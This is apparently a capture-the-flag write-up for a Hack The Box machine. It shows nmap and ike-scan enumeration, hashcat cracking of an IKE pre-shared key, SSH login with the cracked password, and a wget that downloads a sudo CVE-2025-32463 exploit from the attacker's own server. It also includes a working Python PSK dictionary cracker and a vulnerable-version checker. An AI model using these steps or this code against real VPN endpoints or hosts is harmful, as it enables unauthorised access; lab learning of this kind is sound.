🔍 1. Reconnaissance
I started the machine using htb-toolkit in AthenaOS, then ran an nmap scan on all TCP ports with default scripts and version detection, converting the XML output to HTML with xsltproc:
doas nmap expressway.htb -p- --min-rate 4500 --max-rtt-timeout 1500ms -sC -sV -oA enum && xsltproc enum.xml -o enum.html
It returns that only SSH is open, which is unusual.

🎯 1.1 UDP Scan
I ran a UDP scan (it takes a long time) looking for more leads:
doas nmap expressway.htb -sU -sV --max-rate 1500 --max-retries 2 -T4 -F --version-intensity 0 -oA enum_udp && xsltproc enum_udp.xml -o enum_udp.html
This part is there to make the scan faster:
--max-rate 1500 --max-retries 2 -T4 -F --version-intensity 0
--max-rate caps the packets sent per second, --max-retries 2 limits probe retransmissions (UDP services rarely answer, so nmap would otherwise retry a lot), -T4 selects the aggressive timing template, -F scans only the 100 most common ports, and --version-intensity 0 sends only the lightest version probes.
The -sU flag tells nmap to scan UDP ports, as it scans TCP by default.

So we get back 500/UDP, which is used by ISAKMP.
Internet Security Association and Key Management Protocol (ISAKMP) is the protocol defined by RFC 2408 for establishing security associations (SAs) and cryptographic keys in an Internet environment. It is the framework that IKE (RFC 2409) runs over, so an open 500/UDP usually means an IKE VPN endpoint.
🛡️ 2. ISAKMP Enumeration
Looking for tools to enumerate ISAKMP, I found ike-scan.
Checking the man page of ike-scan, we can find some interesting options, like aggressive mode (-A, --aggressive) and the PSK-cracking output option (-P, --pskcrack).
Aggressive mode matters here: in IKEv1 aggressive mode with pre-shared-key authentication, the responder sends its HASH_R in the clear in its first reply, and that hash is computed over values that are all visible on the wire (both Diffie-Hellman public values, both cookies, the initiator's SA proposal, the responder ID and both nonces) plus the PSK. The PSK is the only unknown, so it can be brute-forced offline, which is exactly what -P saves the parameters for. Main mode sends the same hash encrypted, so it does not leak this way.
📡 2.1 IKE-Scan
So I started my scan with the following command:
doas ike-scan -A -Ppasskey expressway.htb -M
The -M flag prints each payload on its own line. The output gives us information about the ISAKMP configuration of the machine, and -Ppasskey saves the PSK-cracking parameters to the file passkey. We don't need the rest for now, so let's start by cracking the hash.

🔓 2.2 Hash Cracking
I used hashcat to crack the hash with the rockyou.txt wordlist.
hashcat passkey rockyou.txt --show
As hashcat detected the hash type (IKE-PSK SHA1, mode 5400), we run the command again with the hash type set explicitly:
hashcat -m 5400 passkey rockyou.txt --show
And here's our password: freakingrockstarontheroad.
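To show why aggressive mode plus --pskcrack is enough to recover the key, here is an added example (written for this page; it is not code from ike-scan, hashcat or the original write-up) that implements the IKEv1 PSK responder-hash computation from RFC 2409 section 5.4 and runs a dictionary attack over a line in ike-scan's pskcrack format, which is the same computation hashcat -m 5400 (SHA1) and -m 5300 (MD5) perform. All "captured" values are constructed stand-ins (deterministic bytes and a private-range IPv4 responder ID), the four-word list stands in for rockyou.txt, and the password is the one from the text.

```python
import hashlib
import hmac
from typing import Dict, Iterable, Optional

# ike-scan --pskcrack writes one line of nine colon-separated hex fields:
#   g_xr:g_xi:cky_r:cky_i:sai_b:idir_b:ni_b:nr_b:hash_r
# which is exactly what hashcat -m 5300 (MD5) / -m 5400 (SHA1) consume.
FIELDS = ("g_xr", "g_xi", "cky_r", "cky_i", "sai_b", "idir_b", "ni_b", "nr_b", "hash_r")


def hash_r(psk: bytes, f: Dict[str, bytes], hashname: str) -> bytes:
    """IKEv1 PSK responder hash (RFC 2409, section 5.4), prf = HMAC-<hash>.

    SKEYID = prf(PSK, Ni_b | Nr_b)
    HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b)
    """
    skeyid = hmac.new(psk, f["ni_b"] + f["nr_b"], hashname).digest()
    data = f["g_xr"] + f["g_xi"] + f["cky_r"] + f["cky_i"] + f["sai_b"] + f["idir_b"]
    return hmac.new(skeyid, data, hashname).digest()


def parse_pskcrack_line(line: str) -> Dict[str, bytes]:
    parts = line.strip().split(":")
    if len(parts) != len(FIELDS):
        raise ValueError("expected %d colon-separated hex fields" % len(FIELDS))
    return {name: bytes.fromhex(value) for name, value in zip(FIELDS, parts)}


def format_pskcrack_line(f: Dict[str, bytes]) -> str:
    return ":".join(f[name].hex() for name in FIELDS)


def crack_psk(line: str, wordlist: Iterable[str]) -> Optional[str]:
    """Offline dictionary attack: everything in HASH_R except the PSK was sent
    in the clear during aggressive mode, so every candidate can be tested
    locally without sending another packet to the VPN endpoint."""
    f = parse_pskcrack_line(line)
    # The prf is the negotiated hash; the digest length tells MD5 and SHA1 apart.
    hashname = {16: "md5", 20: "sha1"}.get(len(f["hash_r"]))
    if hashname is None:
        raise ValueError("unsupported prf digest length %d" % len(f["hash_r"]))
    for candidate in wordlist:
        candidate = candidate.rstrip("\r\n")
        if hmac.compare_digest(hash_r(candidate.encode(), f, hashname), f["hash_r"]):
            return candidate
    return None


def _fill(label: str, n: int) -> bytes:
    """Deterministic stand-in for bytes that would be captured off the wire
    (constructed test data, not a real exchange)."""
    out = b""
    while len(out) < n:
        out += hashlib.sha256(label.encode() + len(out).to_bytes(2, "big")).digest()
    return out[:n]


def build_sample_capture(psk: bytes, hashname: str = "sha1") -> str:
    """Build the pskcrack line ike-scan -A -P would have saved for a constructed
    aggressive-mode exchange in which the responder used `psk`."""
    f = {
        "g_xr": _fill("g_xr", 128),   # DH group 2 public values are 1024 bits
        "g_xi": _fill("g_xi", 128),
        "cky_r": _fill("cky_r", 8),   # responder / initiator cookies
        "cky_i": _fill("cky_i", 8),
        "sai_b": _fill("sai_b", 52),  # body of the initiator's SA payload
        # ID payload body: ID_IPV4_ADDR (type 1), proto 0, port 0, 192.168.0.1 (constructed)
        "idir_b": bytes.fromhex("01000000c0a80001"),
        "ni_b": _fill("ni_b", 20),    # nonces
        "nr_b": _fill("nr_b", 20),
    }
    f["hash_r"] = hash_r(psk, f, hashname)
    return format_pskcrack_line(f)


if __name__ == "__main__":
    # Constructed wordlist standing in for rockyou.txt.
    wordlist = ["password", "123456", "freakingrockstarontheroad", "letmein"]
    line = build_sample_capture(b"freakingrockstarontheroad")
    print("pskcrack line:", line[:60] + "...")
    print("recovered PSK:", crack_psk(line, wordlist))
```

The only secret in the whole computation is the PSK, so the cost of the attack is one HMAC-SHA1 pair per candidate; that is why a hashcat run over rockyou.txt finishes in seconds and why a VPN endpoint that answers aggressive mode with a dictionary PSK should be treated as having no authentication at all.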
🚪 3. Initial Access
At first I tried accessing the machine through IKE, but it didn't work, so I tried spraying the password. Since only SSH was available, I tried connecting over SSH with the credentials we have:
ssh ike@expressway.htb
[password]: freakingrockstarontheroad
and it worked, giving me the user flag.

⬆️ 4. Privilege Escalation
Now that I have initial access to the machine, I need to get to the root user. I decided to do some manual checking since it's an easy machine.
⚡ 4.1 Sudo & SUID Binaries
I started by checking which commands this user can run with sudo.
sudo -l
Sadly we can't run sudo as this user.
So I tried SUID binaries:
find / -perm -4000 2>/dev/null
📧 4.2 Exim4 Exploitation
Exim is a mail transfer agent used on Unix-like operating systems.
exim4 seemed promising: it's not a binary you see every day in a SUID list, and searching for CVEs showed that several had been found in it before.
However, it turned out I can't execute the binary, so I had to look for another way.
🔎 4.3 CVE Research
After some frustration, I remembered a step I had overlooked: checking for sudo CVEs.
sudo --version
Checking Exploit-DB, I found CVE-2025-32463 (the sudo chroot local privilege escalation, which affects sudo 1.9.14 through 1.9.17). So I downloaded the exploit and started a Python web server on my machine:
python -m http.server 8080
and on the target machine:
wget http://<VPN_IP>:8080/exploit.sh
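The version check above is the step that was easy to skip, so here is an added example (my code, not from the write-up or from the exploit it downloads) that parses the output of sudo --version and tells you whether the version falls in the range the public advisory gives for CVE-2025-32463, 1.9.14 through 1.9.17 inclusive, fixed in 1.9.17p1; that range is an assumption of this example, not something the write-up states. The sample outputs are constructed, not captured from the target.

```python
import re
import subprocess
from typing import Optional, Tuple

Version = Tuple[int, int, int, int]  # (major, minor, patch, p-level)

# CVE-2025-32463 (sudo -R / --chroot local privilege escalation): upstream
# sudo 1.9.14 through 1.9.17 inclusive, fixed in 1.9.17p1. Range taken from the
# public advisory; it is an assumption of this example, not from the write-up.
VULN_LOW: Version = (1, 9, 14, 0)
VULN_HIGH: Version = (1, 9, 17, 0)

_VERSION_RE = re.compile(r"Sudo version (\d+)\.(\d+)\.(\d+)(?:p(\d+))?")


def parse_sudo_version(output: str) -> Optional[Version]:
    """Parse the first line of `sudo --version`, e.g. "Sudo version 1.9.15p5"."""
    m = _VERSION_RE.search(output)
    if not m:
        return None
    major, minor, patch, p = m.groups()
    return (int(major), int(minor), int(patch), int(p or 0))


def in_cve_2025_32463_range(v: Version) -> bool:
    """Tuple comparison handles the p-level: 1.9.17 is in range, 1.9.17p1 is not."""
    return VULN_LOW <= v <= VULN_HIGH


def check_local_sudo() -> Optional[bool]:
    """Run sudo --version (it works without any sudoers entry) and classify it.
    Returns None if sudo is missing or the output cannot be parsed."""
    try:
        proc = subprocess.run(["sudo", "--version"], capture_output=True, text=True, check=False)
    except FileNotFoundError:
        return None
    v = parse_sudo_version(proc.stdout)
    return None if v is None else in_cve_2025_32463_range(v)


if __name__ == "__main__":
    # Constructed sample outputs, not captured from the target.
    for sample in ("Sudo version 1.9.17\n", "Sudo version 1.9.17p1\n", "Sudo version 1.9.13p3\n"):
        v = parse_sudo_version(sample)
        verdict = "in affected range" if v and in_cve_2025_32463_range(v) else "outside range"
        print(sample.strip(), "->", verdict)
    print("this host:", check_local_sudo())
```

Treat a hit as a lead, not a confirmation: distribution packages often backport the fix without changing the upstream version string, so on a Debian- or Ubuntu-based target also check the package changelog before spending time on the exploit.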
Now I hit a problem. It's not related to the challenge, but I thought it would be good to share.
The file was saved in DOS format, meaning each line ends with CR+LF instead of the LF alone that Linux uses, so the shebang line is read as /bin/bash followed by a carriage return and the script fails to execute. I had to change the file format, so I used vim on my machine:
:set ff
:set ff=unix
:set ff returns the current value (fileformat=dos here) and :set ff=unix updates it.
Now we’re in and we can get the flag

Some information may be outdated